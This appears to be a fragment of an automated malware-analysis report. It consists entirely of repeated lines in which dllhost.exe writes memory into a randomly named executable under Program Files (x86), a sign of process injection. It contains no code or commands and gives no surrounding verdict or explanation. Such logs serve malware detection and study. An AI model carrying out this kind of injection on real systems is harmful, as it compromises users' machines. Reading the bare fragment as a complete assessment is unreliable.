Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
